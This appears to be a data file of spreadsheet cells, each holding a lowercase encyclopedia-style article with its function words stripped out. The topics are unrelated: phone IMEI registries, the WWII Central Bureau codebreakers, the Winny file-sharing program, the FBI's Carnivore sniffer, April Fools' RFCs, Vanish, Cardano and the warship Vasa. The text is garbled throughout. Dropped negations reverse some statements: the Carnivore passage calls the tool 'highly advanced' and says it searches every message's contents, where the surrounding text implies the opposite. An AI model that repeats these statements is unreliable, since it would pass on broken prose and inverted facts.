whitelisting imei devices imported individual blacklisting imei stolen/lost devices binding imei subscriber's number and, vice versa, unbinding imei subscriber. system implementation results goals results ceir implementation country usually: reducing mobile phone theft reducing import devices stolen countries reducing presence counterfeit devices market (null imei, incorrect imei, changed imei) reducing illegal imports mobile devices (increase collection customs duties)additionally, ceir often contributes solution problems: combating various mobile fraud schemes obtaining accurate statistics state mobile communications market regulator fight terrorism (the ability block device mobile networks country).known results achieved countries: great britain reducing mobile phone theft. turkey reducing mobile phone theft, decreasing current account deficit turkey maximizing revenues. uzbekistan preventing black import mobile devices 98%, increase revenues import mobile devices 700%. kenya disposing market counterfeit mobile equipment. azerbaijan disposing market counterfeit mobile equipment. ukraine increasing legally imported mobile devices 95%, increase revenues import mobile devices. ceir manufacturers some countries used local developers implement ceir country (great britain, turkey, india, azerbaijan). there also number companies offer solution already installed least country: invigo, mediafon datapro, portingxs, qualcomm, svyazcom. system standardized 2g-5g networks. such system established mobile network even doesn’t black list ceir country. common manufacturers companies broadforward, mahindra comviva, primal technologies, mavenir, nokia, svyazcom. some developers mno’s signal core include complex solution. however, standard capabilities usually lacking specific requirements implementing ceir. also imei article relatively detailed ceir/blacklist section references</t>
  </si>
  <si>
    <t>Central Bureau</t>
  </si>
  <si>
    <t>central bureau allied signals intelligence (sigint) organisations south west pacific area (swpa) world central bureau attached headquarters allied commander south west pacific area, douglas macarthur. central bureau's role research decrypt intercepted imperial japanese army (land air) traffic work close co-operation sigint centres usa, united kingdom india. activities included army navy forces, independent japanese force. unit joint royal australian navy/united states navy fleet radio unit, melbourne (frumel), reported directly c-in-c, pacific (admiral chester nimitz) hawaii chief naval operations (admiral king) washington. background general douglas macarthur signals intelligence unit, station command philippines started, fully dependent u.s. navy type information. however, signals intelligence received navy unit, station cast, originally cavite manila navy yard, evacuated corregidor island japanese successes. prior war, sent courier, caused delay annoyance. general macarthur escaped corregidor philippines boat mindanao flew australia monte boeing b-17 flying fortress. made melbourne, arriving march 1942. signals intelligence units operating australia time macarthur's arrival melbourne follows: australian special wireless section park orchards near ringwood melbourne small diplomatic press intercept section park orchards diplomatic cryptographic intelligence section victoria barracks, melbourne some british army signals personnel east combined bureau escaped java small raaf intercept section darwin small intercept direction finding (d/f) organisation small cryptographic intelligence section navy office melbourneand, eventually, evacuation corredigor submarine, personnel station cast, navy signit group eastone first decisions arrived melbourne expand sigint operations already existing australia. some personnel united states navy crypto group philippines, evacuated early january 1942, operating melbourne. they responsible channeling sigint information op-20-g washington. brigadier general spencer akin, macarthur's chief signals officer held discussions major general colin simpson. they agreed research control centre handle signals intelligence (sigint) needed. macarthur subsequently issued orders formation complementary groups: intercept organisation known initially wireless section research control centre known central bureau.initially central bureau made american, australian army raaf personnel. hence central bureau unusual cryptographic organisation, coming direct command area commander (macarthur) rather reporting central cryptographic organisation; confirmed marshall's reply. this decision periodic ructions american military establishment macarthur's command cryptographic service command; privilege jealously guarded. liaison frumel macarthur happy depend navy's discretion handling sigint requirements. felt experienced problems arrangement manila. macarthur's intelligence officer (g-2) major general charles willoughby. australia rules laid cmdr rudy fabian head frumel (through admiral leary) receiving frumel briefings said fabian representative brief macarthur chief staff richard sutherland 1400 day, could copy distribute material. representative kept waiting. only macarthur sutherland present; willoughby, excluded. once fabian burnt document front willoughby dropped ashes demonstrate allowed message april 1942 indicated "rzp campaign" port moresby invasion raid would isolate australia america. fabian frumel briefed macarthur "incredulous" expected target would caledonia, fabian explained (jn-25) code-breaking process showed japanese commander’s intercepted message objectives restrict enemy fleet movements attack north coast australia. transport leave next caledonia sent port moresby. april fabian showed macarthur amassing large force truk, planned occupy tulagi also. macarthur australian reconnaissance plane "discover" port moresby invasion force may, leading battle coral sea. messages indicated japanese proposing land buna overland owen stanley range kokoda track port moresby; though macarthur, willoughby blamey unconvinced saying "nobody right senses would land there". blamey took "minimal precautions" defend track, resulting heavy losses 39th battalion sent there. central bureau's origins central bureau joint us-australian signal intelligence organisation, established april 1942 command army major general spencer akin, headquarters melbourne. general macarthur advised washington decision dispatch april 1942. described role group "the interception cryptanalyzing japanese intelligence". small naval cryptographic group also became part secret unit. commander eric nave, professor dale trendall working japanese diplomatic naval codes victoria barracks. central bureau established gabled, ivy-clad mansion called "cranleigh" domain road, south yarra, melbourne. central bureau's role research decrypt army intercept traffic work close co-operation sigint centres usa, united kingdom india. sandford appointed commanding officer central bureau. major general akin's executive officer, major (later colonel) sherr evacuated philippines (station responsible arranging first group "sigint" personnel come australia, akin's control indirect responsible day-to-day running bureau. killed returning liaison visit wireless experimental centre india, aircraft crashed calcutta airfield september 1943. sandford wanted send "pappy" clark conference akin said macarthur would agree send clark (only major) sent colonel sherr instead.he succeeded major abraham "abe" sinkov, mathematician, appointed assistant director central bureau. sinkov previously senior cryptographer army signals intelligence service william friedman. sinkov previously charge intercept station panama. visited britain 1941 facilitate exchange cryptographic information. with sinkov army), three assistant directors australians alistair "mic" sandford (major lt-col, second aif) booth (squadron leader wing commander, raaf). they acted head respective service organisations; sandford bureau executive officer sherr, booth 1944. bureau functioned well harmoniously, demarcation australian experience wireless interception traffic analysis middle east americans breaking codes cyphers, although "broke down" went signals organisations tend "meritocratic" rather rank.experienced intercept kana operators royal australian force unit townsville assigned central bureau. raaf time number kana operators trained train waaaf personnel. (katakana syllabic forms written japanese). cryptanalysts operated malinta tunnel battle corregidor australia submarine groups. their equipment pushed manila bay. they used assist australian wireless group units. group cryptographic, cryptanalytic translator personnel japanese section washington signal intelligence service also moved australia. more australians also recruited central bureau established. structure central bureau comprised: administrative personnel supply personnel cryptographic personnel cryptanalytic personnel interpreters translators field section included intercept communications personnelon april 1942 small raaf intercept station operating back-to-back houses sycamore street french street suburb pimlico townsville given name wireless unit became part central bureau. newly named unit included raaf, united states army personnel wireless unit townsville. this raaf unit started earlier march 1942 small intercept station located initial houses pimlico wing commander booth. july 1942 intercept operator numbers central bureau increased twenty nine. commander nave moved central bureau mid-1942 combined australian navy/u.s. navy operation melbourne known frumel, came u.s. navy control rudy fabian) mid-1942. fabian thought nave breached security, nave civilians (including professor thomas room, also went central bureau); holden agreement specifically stated eric nave work frumel, indicating fabian "friends high places".although nave headed "solutions" division there, records indicate personally dealt minor japanese naval codes simple substitution ciphers spite japanese language capability long history japanese codes. however duffy wrote nave actively working jn-25 expelled monterrey. colonel sinkov american staff worked high-level japanese army codes. central bureau break high level japanese army codes mid-1943 success water transport code. january 1944, main line japanese army code broken help buried trunk found sio, guinea, left retreating japanese army troops 20th division. bureau spent drying damp pages, flood decoded messages ensued meant macarthur navy assistance (the japanese thought papers destroyed).on july 1942, general macarthur moved headquarters brisbane. separate american intelligence operation located nearby building called "palma rosa" queens road, hamilton. "palma rosa" commandeered counter intelligence corps, section, headquarters u.s. army forces east (u.s.a.f.f.e.). central bureau also relocated brisbane september, american contingent officers eighteen enlisted moving first. bureau moved suburb ascot, american airfield eagle farm airport. staff accommodated boarders private homes military camps daily transport truck bus. officers obtained rented accommodation around ascot nearby suburbs. sandford head australian army contingent rented house elderney terrace nearby hamilton; became social centre scene frequent dinner drinking parties. headquarters "nyrambla", huge house henry street built grand mansion 1886, although large section subdivided 1905 house converted flats late 1920s. house still retained rooms marble fireplaces, ornate plaster 4.8m high ceilings, building remained main administrative training centre bureau.when bureau assumed augmented role coordinate land forces signals intelligence, additional facilities located minutes walk away small public park opposite ascot railway station hence became known "ascot park" although officially called "oriel park". between station, kitchener road lancaster road, park nearly temporary army wooden huts mid-1943 september 1945. across road kitchener road disused brick fire station used banks punched card equipment used cryptanalysts analyze intercepted cyphertext. machines garage rear henry street noise all-hours operation bought complaints neighbours. when machines removed henry street garage occupied australian cypher section filled typex machines operated mostly australian women's army service (awas) personnel.beginning january 1942, u.s. navy stations hawaii (station hypo), cavite/corregidor (station cast) op-20-g (station negat, washington) began issuing formal intelligence decrypts advance u.s. army central bureau. frumel australia obtained equipment 1942 replace left behind manila leaving corregidor employed throughout tenure melbourne. japanese pow's interrogated atis house called "tighnabruaich" indooroopilly brisbane. central bureau henry street, ascot, brisbane decrypted japanese army air/ground signal intercepted wireless section darwin contained admiral isoroku yamamoto's itinerary upcoming trip rabaul. admiral yamamoto, commander chief combined japanese fleet, architect attack pearl harbor. central bureau reportedly sent decrypted message frumel reportedly translated u.s. navy linguist. although central bureau decrypted message, interception flight based decrypts japanese naval messages frupac/station hypo hawaii, frumel, op-20-g washington station guadalcanal. major lasswell usmc hawaii decrypted japanese naval message first captain layton (pacific fleet intelligence hawaii) gave admiral nimitz authorized shootdown attempt determining comnavairsopac could done army corp units guadalcanal. central bureau precursor defense signals bureau, number name changes (from 2013) called australian signals directorate. references bibliography bou, jean (2012). macarthur’s secret bureau: story central bureau. loftus australia: australian military history publications. isbn 978-0-9872387-1-9. dufty, david (2017). secret code-breakers central bureau. melbourne, london: scribe. isbn 9781925322187. smith, michael (2000). emperor’s codes: bletchley park breaking japan’s secret ciphers. london: bantam press. isbn 0593 046412. further reading bleakley, jack (1991). eavesdroppers. canberra: agps (australian government publishing service). isbn 0-644-22303-0. holmes, (1979). double-edged secrets: u.s. naval intelligence operations pacific during world annapolis, maryland: blue jacket books/naval institute press. isbn 1-55750-324-9. parker, frederick priceless advantage: u.s. navy communications intelligence battles coral sea, midway, aleutians". national security agency, central security service. retrieved november 2006. prados, john (1995). combined fleet decoded: secret history american intelligence japanese navy world york: random house. isbn 0-679-43701-0.</t>
  </si>
  <si>
    <t>Winny</t>
  </si>
  <si>
    <t>winny (also known winny) japanese peer-to-peer (p2p) file-sharing program developed isamu kaneko, research assistant university tokyo 2002. like freenet, user must encrypted node list order connect nodes network. users choose three cluster words symbolize interests, winny connects nodes share cluster words, downloading storing encrypted data cache neighbors distributed data store. users want particular file, triggers (keywords), winny download files marked triggers. encryption meant provide anonymity, winny also included bulletin boards users would announce uploads, address posters could discovered boards. while freenet implemented java, winny implemented windows application.the software takes name winmx, advanced letter latin alphabet, netagent published survey june 2018 suggesting winny still popular network japan ahead perfect dark (p2p) share (p2p) approximately 45,000 nodes connecting golden week. number nodes winny appears holding steady compared 2015. kaneko first announced winny download software board 2channel (2ch short) japanese bulletin board site. since 2channel users often refer anonymous users post numbers, kaneko came known "mr. ("47-shi", japanese), "47". after winny's development stopped, peer-to-peer application, share, developed successor. antinny since august 2003, several worms called "antinny" spread winny network. some versions antinny work follows: upload files host computer onto winny network. upload screenshots onto image board. denial-of-service attack copyright protecting agency site.some people uploaded information unwittingly computers antinny. that information includes governmental documents, information customers, people's private files. once information uploaded, difficult delete. recently, highly publicized cases sensitive file uploading come light japan's media. particular, defense agency forced admit classified information maritime self defense force uploaded computer winny software installed following this, nippon airways suffered embarrassing leak passwords security-access areas airports across japan. similar incident occurred airlines december 2005, virus originating winny affected computer co-pilot.perhaps largest winny-related leak okayama prefectural police force, whose computer leaked data around 1,500 investigations. this information included sensitive data names crime victims, largest amount information held japanese police ever leaked online. arrests court cases november 2003, japanese users winny, yoshihiro inoue, 41-year-old self-employed businessman takasaki, gunma prefecture unemployed 19-year-old matsuyama, arrested kyoto prefectural police. they accused sharing copyrighted material winny admitted crimes. shortly following users' arrests, kaneko also home searched source code winny confiscated kyoto police. 2004, kaneko arrested suspected conspiracy encourage copyright infringement high-tech crime taskforce kyoto prefectural police. kaneko released bail june 2004. court hearings started september 2004 kyoto district court. december 2006, kaneko convicted assisting copyright violations sentenced fine ¥1.5 million (about us$13,200). appealed ruling. october 2009, guilty verdict overturned osaka high court. december 2011, kaneko cleared charges panel judges agreed prosecution could prove intention promote software illegal use. also anonymous file sharing japan perfect dark share winmx winny copyright infringement case references further reading kaneko isamu (2005). technology winny(winnyの技術 japanese). ascii. 201. isbn 4-7561-4548-5. (japanese) external links japanese) winny? japanese) download nodes winny, share, perfect dark japanese) post critics claim kaneko states development kaneko spoke pushing tide toward world filled copyright violation japanese power plant secrets leaked virus, register, 2006</t>
  </si>
  <si>
    <t>Carnivore (software)</t>
  </si>
  <si>
    <t>carnivore, later renamed dcs1000, system implemented federal bureau investigation (fbi) designed monitor email electronic communications. used customizable packet sniffer could monitor target user's internet traffic. carnivore implemented october 1997. 2005 replaced improved commercial software. development carnivore grew earlier project called "omnivore", replaced older undisclosed time) surveillance tool migrated navy director integrity compliance, patrick kelley. september 1998, fbi's data intercept technology unit (ditu) quantico, virginia, launched project migrate omnivore sun's solaris operating system windows platform. this done facilitate miniaturization system support wider range personal computer (pc) equipment. migration project called "phiple troenix" resulting system named "carnivore." configuration carnivore system microsoft windows-based workstation packet-sniffing software removable disk drive. this computer must physically installed internet service provider (isp) location "sniff" traffic segment look email messages transit. technology highly advanced—it used standard packet sniffer straightforward filtering. monitor keyboard present isp. critical components operation filtering criteria. copies every packet made, required filtering later time. accurately match appropriate subject, elaborate content model developed. independent technical review carnivore justice department prepared 2000. controversy several groups expressed concern regarding implementation, usage, possible abuses carnivore. july 2000, electronic frontier foundation submitted statement subcommittee constitution committee judiciary united states house representatives detailing dangers system. electronic privacy information center also made several releases dealing it.the countered concerns statements highlighting target-able nature carnivore. assistant director donald kerr quoted saying: carnivore device works much like commercial "sniffers" network diagnostic tools used isps every day, except provides unique ability distinguish communications lawfully intercepted not. example, court order provides lawful interception type communication (e.g., e-mail), excludes communications (e.g., online shopping) carnivore tool configured intercept e-mails transmitted either named subject. [it] specialized network analyzer "sniffer" runs application program normal personal computer microsoft windows operating system. works "sniffing" proper portions network packets copying storing packets match finely defined filter programmed conformity court order. this filter extremely complex, provides ability collect transmissions comply register court orders, trap trace court orders, title interception orders, etc.... ...it important distinguish meant "sniffing." problem discriminating users' messages internet complex one. however, exactly carnivore does. search contents every message collect contain certain words like "bomb" "drugs." selects messages based criteria expressly court order, example, messages transmitted particular account particular user. after prolonged negative coverage press, changed name system "carnivore" benign-sounding "dcs1000." reported stand "digital collection system"; system functions before. successor associated press reported mid-january 2005 essentially abandoned carnivore 2001, favor commercially available software, narusinsight, mass surveillance system. report 2007 described successor system located "inside internet provider's network junction point router network switch" capable indiscriminately storing data flowing provider's network. also other cyber-assets: cointelpro: series covert illegal projects aimed surveilling, infiltrating, discrediting, disrupting american political organizations dws-edms: electronic database; full capabilities classified minimum, provides searchable archive intercepted electronic communications, including email sent internet ditu: unit responsible intercepting telephone calls e-mail messages dcsnet: fbi's point-and-click surveillance system magic lantern: fbi's keyloggersimilar projects: echelon: nsa's worldwide digital interception program room 641a: nsa's interception program, started circa 2003, first reported 2006 total information awareness: mass detection program united states defense advanced research projects agency (darpa)related: communications assistance enforcement act: wiretapping laws passed 1994 harris corporation: american technology company, defense contractor, information technology services provider policeware: software designed police citizens monitoring discussion interaction citizens references external links epic collection documents carnivore carnivore software official website</t>
  </si>
  <si>
    <t>Validation authority</t>
  </si>
  <si>
    <t>public infrastructure, validation authority (va) entity provides service used verify validity digital certificate mechanisms described x.509 standard 5280 (page 69).the dominant method used purpose host certificate revocation list download http ldap protocols. reduce amount network traffic required certificate validation, ocsp protocol used instead. while validation authority capable responding network-based request crl, lacks ability issue revoke certificates. must continuously updated current information certificate authority issued certificates contained within crl. while potentially labor-intensive process, dedicated validation authority allows dynamic validation certificates issued offline root certificate authority. while root unavailable network traffic, certificates issued always verified validation authority protocols mentioned above. ongoing administrative overhead maintaining crls hosted validation authority typically minimal, uncommon root issue revoke) large numbers certificates. references</t>
  </si>
  <si>
    <t>April Fools' Day Request for Comments</t>
  </si>
  <si>
    <t>request comments (rfc), context internet governance, type publication internet engineering task force (ietf) internet society (isoc), usually describing methods, behaviors, research, innovations applicable working internet internet-connected systems. almost every april fools' april) since 1989, internet editor published humorous request comments (rfc) documents, following path blazed june 1973 called arpawocky, parody lewis carroll's nonsense poem "jabberwocky". following list also includes humorous rfcs published dates. list april fools' rfcs 1978 crispin april 1978). telnet randomly-lose option. ietf. doi:10.17487/rfc0748. 748. parody tcp/ip documentation style. long time specially marked index "note date issue".1989 miller april 1989). telnet subliminal-message option. ietf. doi:10.17487/rfc1097. 1097.1990 david waitzman april 1990). standard transmission datagrams avian carriers. ietf. doi:10.17487/rfc1149. 1149. (see avian carriers) updated 2549; below. describes protocol transmitting packets homing pigeon. 2001, 1149 actually implemented members bergen linux user group. also 6214, noted below. describes adaptation 1149 ipv6.1991 poorer richard; prof. kynikos april 1991). gigabit network economics paradigm shifts. ietf. doi:10.17487/rfc1216. 1216. vint cerf april 1991). memo consortium slow commotion research (cscr). ietf. doi:10.17487/rfc1217. 1217.1992 partridge april 1992). today's programming krfc 1313 internet talk radio. ietf. doi:10.17487/rfc1313. 1313.1993 borenstein; linimon april 1993). extension mime content-types medium. ietf. doi:10.17487/rfc1437. 1437. lyman chapin; huitema april 1993). internet engineering task force statements boredom (sobs). ietf. doi:10.17487/rfc1438. 1438.1994 william shakespeare april 1994). sonet sonnet translation. ietf. doi:10.17487/rfc1605. 1605. attributed william shakespeare. onions april 1994). historical perspective usage version ietf. doi:10.17487/rfc1606. 1606. vint cerf april 1994). view 21st century. ietf. doi:10.17487/rfc1607. 1607.1995 steve crocker april 1995). address message. ietf. doi:10.17487/rfc1776. 1776.1996 april 1996). compact representation ipv6 addresses. ietf. doi:10.17487/rfc1924. 1924. callon april 1996). twelve networking truths. ietf. doi:10.17487/rfc1925. 1925. eriksson april 1996). experimental encapsulation datagrams atm. ietf. doi:10.17487/rfc1926. 1926. rogers april 1996). suggested additional mime types associating documents. ietf. doi:10.17487/rfc1927. 1927.1997 ashworth april 1997). naming hosts. ietf. doi:10.17487/rfc2100. 2100.1998 bressen april 1998). rita reliable internetwork troubleshooting agent. ietf. doi:10.17487/rfc2321. 2321. hout; april 1998). management numbers peg-dhcp. ietf. doi:10.17487/rfc2322. 2322. this solely entertainment, described protocol regularly implemented hacker events europe. ramos april 1998). ietf identification security guidelines. ietf. doi:10.17487/rfc2323. 2323. masinter april 1998). hyper text coffee control protocol (htcpcp/1.0). ietf. doi:10.17487/rfc2324. 2324. (see hyper text coffee control protocol) slavitch april 1998). definitions managed objects drip-type heated beverage hardware devices using smiv2. ietf. doi:10.17487/rfc2325. 2325.1999 waitzman april 1999). avian carriers quality service. ietf. doi:10.17487/rfc2549. 2549. updates 1149, listed above. (see avian carriers) glassman; manasse; mogul april 1999). y10k beyond. ietf. doi:10.17487/rfc2550. 2550. bradner april 1999). roman standards process revision iii. ietf. doi:10.17487/rfc2551. 2551.2000 christey april 2000). infinite monkey protocol suite (imps). ietf. doi:10.17487/rfc2795. 2795. concerning practicalities infinite monkey theorem.2001 kennedy april 2001). digit generation protocol. ietf. doi:10.17487/rfc3091. 3091. eastlake 3rd; manros; raymond april 2001). etymology "foo". ietf. doi:10.17487/rfc3092. 3092. gaynor, bradner april 2001). firewall enhancement protocol (fep). ietf. doi:10.17487/rfc3093. 3093.2002 rajagopalan april 2002). electricity ietf. doi:10.17487/rfc3251. 3251. kennedy april 2002). binary lexical octet ad-hoc transport. ietf. doi:10.17487/rfc3252. 3252.2003 bellovin april 2003). security flag ipv4 header (evil bit). ietf. doi:10.17487/rfc3514. 3514. proposal evil bit, ipv4 packet header; later became synonym attempts seek simple technical solutions difficult human social problems require willing participation malicious actors.2004 bradner april 2004). omniscience protocol requirements. ietf. doi:10.17487/rfc3751. 3751.2005 farrel april 2005). requirements morality sections routing area drafts. ietf. doi:10.17487/rfc4041. 4041. crispin april 2005). utf-9 utf-18 efficient transformation formats unicode. ietf. doi:10.17487/rfc4042. 4042. notable containing pdp-10 assembly language code nearly years manufacturer ceased production pdp-10, technically possible opposed many proposals. schulze; lohsen april 2005). burrito carriers. ietf. draft-lohsen-ip-burrito-00.2007 jogi hofmueller; aaron bachmann; iohannes zmoelnig april 2007). transmission datagrams semaphore flag signaling system (sfss). ietf. doi:10.17487/rfc4824. 4824.2008 falk; bradner april 2008). naming rights ietf protocols. ietf. doi:10.17487/rfc5241. 5241. klensin; alvestrand april 2008). generalized unified character code: western european sections. ietf. doi:10.17487/rfc5242. 5242.2009 farrel april 2009). iana considerations three letter acronyms. ietf. doi:10.17487/rfc5513. 5513. vyncke april 2009). ipv6 social networks. ietf. doi:10.17487/rfc5514. 5514. implemented facebook ipv6 facebook.2010 hay; turkal april 2010). option denote packet mood. ietf. doi:10.17487/rfc5841. 5841.2011 k.-m. moller april 2011). increasing throughput networks esp-based forwarding: espbasedforwarding. ietf. doi:10.17487/rfc5984. 5984. carpenter; hinden april 2011). adaptation 1149 ipv6. ietf. doi:10.17487/rfc6214. 6214. (see avian carriers) ritter april 2011). regional broadcast using atmospheric link layer. ietf. doi:10.17487/rfc6217. 6217.2012 pignataro april 2012). null packet. ietf. doi:10.17487/rfc6592. 6592. pignataro; clarke; salgueiro april 2012). service undiscovery using hide-and-go-seek domain pseudonym system (dps). ietf. doi:10.17487/rfc6593. 6593.2013 barnes; kent; rescorla april 2013). further words rfcs indicate requirement levels. ietf. doi:10.17487/rfc6919. 6919. hinden april 2013). design considerations faster-than-light (ftl) communication. ietf. doi:10.17487/rfc6921. 6921.2014 nazar april 2014). hyper text coffee control protocol efflux appliances (htcpcp-tea). ietf. doi:10.17487/rfc7168. 7168. (see hyper text coffee control protocol) turner april 2014). secrecy afforded) certificate extension. ietf. doi:10.17487/rfc7169. 7169.2015 wilhelm april 2015). scenic routing ipv6. ietf. doi:10.17487/rfc7511. 7511. luckie april 2015). really explicit congestion notification (recn). ietf. doi:10.17487/rfc7514. 7514.2016 april published year.2017 danielson; nilsson april 2017). complex addressing ipv6. ietf. doi:10.17487/rfc8135. 8135. carpenter april 2017). additional transition functionality ipv6. ietf. doi:10.17487/rfc8136. 8136. farrel april 2017). arte ascii: true accurate representation menagerie thynges fabulous wonderful forme character. ietf. doi:10.17487/rfc8140. 8140.2018 mizrahi; yallouz april 2018). wrongful termination internet protocol (ip) packets. ietf. doi:10.17487/rfc8367. 8367. kaplan april 2018). internationalizing ipv6 using 128-bit unicode. ietf. doi:10.17487/rfc8369. 8369.2019 fokschaner april 2019). hypertext jeopardy protocol (htjp/1.0). ietf. doi:10.17487/rfc8565. 8565. rye; beverly april 2019). customer management resource records. ietf. doi:10.17487/rfc8567. 8567.2020 mayrhofer, hague, april 2020). internationalized deliberately unreadable network notation (i-dunno). ietf. doi:10.17487/rfc8771. 8771. welzl april 2020). quantum bug. ietf. doi:10.17487/rfc8774. 8774.2021 grover; oever; cath; sahib april 2021). establishing protocol police. ietf. doi:10.17487/rfc8962. 8962.2022 snijders; morrow; mook april 2022). software defects considered harmful. ietf. doi:10.17487/rfc9225. 9225. breen april 2022). bioctal: hexadecimal 2.0. ietf. doi:10.17487/rfc9226. 9226. other humorous rfcs cerf january 1972). parry encounters doctor. ietf. doi:10.17487/rfc0439. 439. merryman, ucsd june 1973). arpawocky. ietf. doi:10.17487/rfc0527. 527.{{citation}}: maint: multiple names: authors list (link) vint cerf december 1985). twas night start-up. ietf. doi:10.17487/rfc0968. 968. hancock (december 1995). 12-days technology before christmas. ietf. doi:10.17487/rfc1882. 1882. null encryption algorithm with ipsec. ietf. november 1998. doi:10.17487/rfc2410. 2410. makes humorous statements null encryption algorithm. non-rfc ietf humor announcement ietf list appointment sesame street character bert member appears april fools' 2006 stunt. submission april fools' rfcs editor accepts submission properly formatted april fools' rfcs general public, considers publication year received least weeks prior april 1st. "note past years editor sometimes published serious documents april dates. readers cannot distinguish satire reading text future marketing." references further reading editor home page hosts individual rfcs external links carolyn duffy marsan (march 2005). "yet another foolish network protocol". network world. 3751 april fools' rfcs general limoncelli, thomas peter salus (2007). complete april fools' rfcs. peer-to-peer communications. isbn 978-1-57398-042-5.</t>
  </si>
  <si>
    <t>Vanish (computer science)</t>
  </si>
  <si>
    <t>vanish project "give users control lifetime personal data stored web." roxana geambasu university washington. project proposed allow user enter information send across internet, thereby relinquishing control however, user able include "expiration date," information longer usable anyone copy even creator. vanish approach found vulnerable sybil attack, thus insecure, team called unvanish university texas, university michigan, princeton. theory vanish acts automating encryption information entered user encryption unknown user. along information user enters, user also enters metadata concerning long information remain available. system encrypts information, store either encryption original information. instead, breaks decryption smaller components disseminated across distributed hash tables, dhts internet. dhts refresh information within nodes schedule unless configured make information persistent. time delay entered user metadata controls long dhts allow information persist, time period over, dhts reuse nodes, making information decryption stored irretrievable. long decryption reassembled dhts, information retrievable. however, period entered user lapsed, information longer recoverable, user never possessed decryption key. implementation vanish currently exists firefox plug-in allows user enter text either standard gmail email facebook message, choose send message vanish. message encrypted sent normal networking pathways cloud recipient. recipient must firefox plug-in decrypt message. plugin accesses bittorrent dhts, 8-hour lifespans. this means user select expiration date message increments hours. after expiration user-defined time span, information overwritten, thereby eliminating key. while user recipient copies original encrypted message, used turn back plain text gone. although particular instance data become inaccessible, important note information always saved means expiration (copied, even screen shots) published again. also cryptography internet privacy proactive cyber defence references</t>
  </si>
  <si>
    <t>Cardano (blockchain platform)</t>
  </si>
  <si>
    <t>cardano public blockchain platform. open-source decentralized, consensus achieved using proof stake. facilitate peer-to-peer transactions internal cryptocurrency, ada.cardano founded 2015 ethereum co-founder charles hoskinson. development project overseen supervised cardano foundation based zug, switzerland. largest cryptocurrency proof-of-stake blockchain, seen greener alternative proof-of-work protocols. background platform began development 2015 launched 2017 charles hoskinson, co-founder ethereum. hoskinson left ethereum dispute co-founders, vitalik buterin; hoskinson wanted accept venture capital create for-profit entity, buterin wanted keep running nonprofit organization. after leaving, co-founded iohk, blockchain-engineering company, whose primary business development cardano, alongside cardano foundation emurgo. platform named italian mathematician gerolamo cardano, cryptocurrency named english mathematician lovelace. sub-unit lovelace; 1,000,000 lovelaces. technical aspects atypically, cardano white paper. instead, uses design principles intended overcome issues faced cryptocurrencies scalability, interoperability, regulatory compliance. cardano claims overcomes problems crypto market: mainly bitcoin slow inflexible, ethereum safe scalable.cardano uses proof-of-stake protocol named ouroboros; contrast bitcoin ethereum, proof-of-work protocols. proof-of-stake blockchains significantly less energy proof-of-work chains. february 2021, hoskinson estimated cardano network used annually, less 0.01% 110.53 used bitcoin network estimated university cambridge.within cardano platform, exists settlement layer. this layer similar bitcoin keeps track transactions. second layer computation layer. this layer designed similar ethereum, enabling smart contracts applications platform.like bitcoin, cardano uses utxo ledger model, though extended version (eutxo) facilitate smart contracts scripting languages.cardano implemented decentralized finance (defi) services september 2021, including upgrade enable smart contracts ability build decentralized applications (dapps). also included plutus, turing-complete smart contract language written haskell, specialised smart contract language, marlowe, designed non-programmers financial sector. cardano's smart contract languages allow developers end-to-end tests program without leaving integrated development environment deploying code. history cardano funded initial coin offering (ico). currency debuted market $600 million. 2017, market billion, reached value billion briefly 2018 general tightening crypto market dropped value back billion. cardano reached market billion 2021 solidified position biggest proof-of-stake cryptocurrency.iohk partnered universities blockchain research. 2017, iohk helped university edinburgh launch blockchain technology laboratory. 2020, iohk donated $500,000 university wyoming support development blockchain technology. applications 2019, ministry education country georgia signed memorandum understanding free university tbilisi cardano atala build credential verification system georgia.in 2019, footwear manufacturer balance announced pilot program cardano blockchain track authenticity newest basketball shoe.in 2018 iohk announced partnership ethiopian government investigate ways deploy cardano country. april 2021, iohk ethiopia ministry education announced plans launch identity record-keeping system cardano country's five million students.in 2021 hoskinson began working electronic dance music paul oakenfold release full-length album cardano blockchain; album titled zombie lobster. references external links official website</t>
  </si>
  <si>
    <t>Vasa (ship)</t>
  </si>
  <si>
    <t>vasa wasa (swedish pronunciation: [²vɑːsa] (listen)) swedish warship built 1626 1628. ship sank sailing roughly 1,300 (1,400 maiden voyage august 1628. fell obscurity valuable bronze cannon salvaged 17th century, located late 1950s busy shipping area stockholm harbor. ship salvaged largely intact hull 1961. housed temporary museum called wasavarvet ("the vasa shipyard") 1988 moved permanently vasa museum royal national city park stockholm. ship sweden's popular tourist attractions seen million visitors since 1961. since recovery, vasa become widely recognized symbol swedish empire. ship built orders king sweden gustavus adolphus part military expansion initiated poland-lithuania (1621–1629). constructed navy yard stockholm contract private entrepreneurs 1626–1627 armed primarily bronze cannons cast stockholm specifically ship. richly decorated symbol king's ambitions sweden himself, upon completion powerfully armed vessels world. however, vasa dangerously unstable, much weight upper structure hull. despite lack stability, ordered foundered minutes encountering wind stronger breeze. order sail result combination factors. king, leading army poland time maiden voyage, impatient take station flagship reserve squadron älvsnabben stockholm archipelago. time king's subordinates lacked political courage openly discuss ship's problems maiden voyage postponed. inquiry organized swedish privy council find responsible disaster, punished. during 1961 recovery, thousands artifacts remains least people found around vasa's hull marine archaeologists. among many items found clothing, weapons, cannons, tools, coins, cutlery, food, drink sails. artifacts ship provided scholars invaluable insights details naval warfare, shipbuilding techniques everyday life early 17th-century sweden. today vasa world's best preserved 17th century ship visited museum scandinavia. wreck vasa continually undergoes monitoring research preserve her. historical background during 17th century, sweden went sparsely populated, poor, peripheral northern european kingdom little influence major powers continental politics. between 1611 1718 dominant power baltic, eventually gaining territory encompassed baltic sides. this rise prominence international affairs increase military prowess, called stormaktstiden ("age greatness" "great power period"), made possible succession able monarchs establishment powerful centralized government, supporting highly efficient military organization. swedish historians described extreme examples early modern state using almost available resources wage war; small northern kingdom transformed fiscal-military state militarized states history.gustavus adolphus (1594–1632) considered successful swedish kings terms success warfare. when vasa built, power decade. sweden embroiled poland-lithuania, looked apprehensively development thirty years' present-day germany. raging since 1618 protestant perspective successful. king's plans polish campaign securing sweden's interests required strong naval presence baltic.the navy suffered several severe setbacks 1620s. 1625, squadron cruising riga caught storm ships aground wrecked. battle oliwa 1627, swedish squadron outmaneuvered defeated polish force large ships lost. tigern ("the tiger"), swedish admiral's flagship, captured poles, solen ("the sun") blown crew boarded nearly captured. 1628, three large ships lost less month. admiral klas fleming's flagship kristina wrecked storm gulf danzig, riksnyckeln ("key realm") aground viksten southern archipelago stockholm vasa foundered maiden voyage.gustavus adolphus engaged naval warfare several fronts, exacerbated difficulties navy. addition battling polish navy, swedes indirectly threatened imperial forces invaded 